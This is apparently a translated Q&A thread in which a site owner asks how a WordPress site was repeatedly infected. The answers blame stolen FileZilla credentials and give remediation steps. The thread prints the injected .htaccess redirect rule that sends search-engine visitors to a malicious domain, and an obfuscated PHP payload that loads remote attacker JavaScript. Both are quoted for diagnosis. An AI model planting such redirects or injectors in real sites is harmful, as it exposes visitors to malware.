web-dev-qa-db-ja.com

Webサイトがマルウェアインジェクション攻撃を受けないようにするにはどうすればよいですか?

私のウェブサイトは、Googleによってマルウェアのウェブサイトとして禁止されました。コードを確認したところ、一部のコードがサーバーに多くのファイルを挿入していることがわかりました。すべてのファイルに挿入されたコードからコードを検索して、サーバー(共有ホスティング)上のすべてのファイルを手動で編集し、すべてのファイルを編集しました。 .htaccessファイルも攻撃者によって変更されました。

2つのWordPressインストールがWebサイトのルートの2つの異なるサブフォルダーにあり、更新されていませんでした。両方を更新しました。

その後、Googleは私のウェブサイトの禁止を解除しました。

昨日、私のWebサイトの.htaccessファイルが攻撃者によって再度変更されたことがわかりました。これがコードです:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|Twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

すべてのファイルで「b58b6f」を検索しましたが、見つかりませんでした。これは、最新の攻撃によって変更された唯一のファイルだと思います。この.htaccessファイルは不要なので削除しました。

ハッカーは私のウェブサイトをどのようにハッキングできたのですか?これが再び発生するのを防ぐ方法は? Webサイトをより安全にするにはどうすればよいですか?

8
Debiprasad

遭遇したマルウェアは「daysofyorr.comウイルス」または MW:HTA:7 のようです。

FTPクライアントとしてFileZillaを使用することをお勧めします。その場合、FileZillaがWebサイトの資格情報をプレーンテキストで保存することを知っている必要があります。ウイルスがあなたの資格情報にアクセスし、次にこのコードを挿入してファイルを更新するためにWordPress installを検索して登録されたすべてのWebサイトにアクセスした可能性があります。

今、あなたはすべきです:

  • コンピュータでウイルス、マルウェアなどを検索します。
  • FileZillaに保存されているすべての登録済みFTPアカウントのFTPパスワードを変更します
  • 最終的にWinSCPなどのより良いFTPシステムを使用する

コメントは遅いですが、FTPクライアントとしてFileZillaを使用していると思います。 FileZillaがFTPサイトの資格情報(site/user/pass)を%APPDATA%フォルダーのプレーンテキストファイルに保存することをご存知ですか?

そして、私はあなたのコンピュータに隠されたマルウェアがあるのではないかと疑っています。 FileZilla認証情報ファイルを取得し、それらを使用して、テーマフォルダー内のheader.phpファイルを変更しました。実際、テーマフォルダーのallで変更されたheader.phpが見つかると思います。

FTPのログファイルを調べるのに十分な技術があれば、それらのファイルへのアクセスが見つかります。ダウンロードしてから、変更されたファイルをアップロードします。また、ルート(「ホーム」)フォルダーにアップロードされたランダムなファイル名が見つかるかもしれませんが、これらのファイルはハッカーによって削除されました。

また、ハッカーのFTPログのIPアドレスは中国のものであることがわかります。

推奨:FileZillaをアンインストールし、%APPDATA%フォルダーからFileZillaフォルダーを削除し、FTPパスワード(およびホストパスワード)を変更します。変更されたheader.phpfooter.php、およびwp-settings.phpファイルを探します。

"daysofyorr.comウイルス"の場合、次のコードを見つけた場合、いくつかのPHPファイル(index.phpなど)を確認することで確認できます。

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

それでおしまい!

詳細については、次のように変換されます。

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>

最近は404につながるようです。

7
Cyril N.
  1. ログをチェックして、侵害されたポイントを解決できるかどうかを確認します
  2. Wordpressとすべてのプラグインが最新であることを確認してください。Wordpressは非常に一般的に使用されているシステムであるため、脆弱性が非常に発生しやすくなります。
  3. それでも何が起こっているのかわからない場合は、共有ホスティングを提供している会社に連絡して問題を認識させることをお勧めします。これは、古いアプリケーションまたはホストしている何かの結果である可能性があるためです。
2
Mark Davidson
  1. ホスティング会社が独自のバージョンのwordpressを常に更新している場合は、そのVSを自分で新規インストールすることをお勧めします。侵害される可能性は、 VIA管理パネルのみにアクセスできます。

  2. Filezillaについては、SFTPとFTPSをサポートしているため、ホストが暗号化されたFTPをサポートしている場合は別のオプションとなる場合があります。

  3. 最後に、北米以外のIP範囲をブロックできる場合があります。ほとんどの攻撃は海外から行われるため、通常は追跡する価値のない法的手段を作るためです。

1
Brad